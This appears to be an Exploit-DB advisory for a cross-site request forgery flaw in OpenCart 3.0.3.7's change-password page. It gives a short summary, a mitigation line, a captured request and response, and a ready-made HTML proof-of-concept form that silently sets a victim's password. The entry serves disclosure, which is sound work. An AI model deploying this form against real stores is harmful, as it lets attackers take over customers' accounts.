OpenCart 3.0.3.7 - 'Change Password' Cross-Site Request Forgery (CSRF)

vendor:

OpenCart

by:

Mert Daş

7.8

CVSS

HIGH

Cross-site request forgery

352

CWE

Product Name: OpenCart

Affected Version From: 3.0.3.7

Affected Version To: 3.0.3.7

Patch Exists: YES

Related CWE: N/A

CPE: a:opencart:opencart

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Xampp

2021

OpenCart 3.0.3.7 – ‘Change Password’ Cross-Site Request Forgery (CSRF)

OpenCart is an open source shoping cart system, suffers from Cross-site request forgery through which attacker can manipulate user data via sending him malicious craft url. OpenCart is not using any security token to prevent it against CSRF. It is vulnerable to all location inside User panel.

Mitigation:

Use security tokens to prevent CSRF attacks.

Source

Exploit-DB raw data:

# Exploit Title		: OpenCart 3.0.3.7 - 'Change Password' Cross-Site Request Forgery (CSRF)
# Date		    	: 2021/08/06
# Exploit Author	: Mert Daş merterpreter@gmail.com
# Software Link 	: http://www.opencart.com/index.php?route=download/download
					: https://github.com/opencart
# Software web  	: www.opencart.com
# Tested on: Server : Xampp

# Cross-site request forgery

OpenCart is an open source shoping cart system , suffers from Cross-site request forgery through which attacker can manipulate user data via sending him malicious craft url.

OpenCart is not using any security token to prevent it against CSRF.
It is vulnerable to all location inside User panel.

Header

----------------------------------------------------------
http://localhost/index.php?route=account/password

POST /opencart/index.php?route=account/password HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------3890527419799841332130342675
Content-Length: 300
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/opencart/index.php?route=account/password
Cookie: language=en-gb; currency=EUR; OCSESSID=b21a152616460d44029878c9a0
Upgrade-Insecure-Requests: 1

-----------------------------3890527419799841332130342675
Content-Disposition: form-data; name="password"

123asd!
-----------------------------3890527419799841332130342675
Content-Disposition: form-data; name="confirm"

123asd!
-----------------------------3890527419799841332130342675--


Response

HTTP/1.1 302 Found
Date: Tue, 08 Jun 2021 16:52:59 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.20
X-Powered-By: PHP/7.4.20
Set-Cookie: OCSESSID=b21a152616460d44029878c9a0; path=/
Location: http://127.0.0.1/opencart/index.php?route=account/account
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


----------------------------------------------------------

Simple Poc to change user Password

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/opencart/index.php?route=account/password" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="password" value="1234asd!" />
      <input type="hidden" name="confirm" value="1234asd!" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>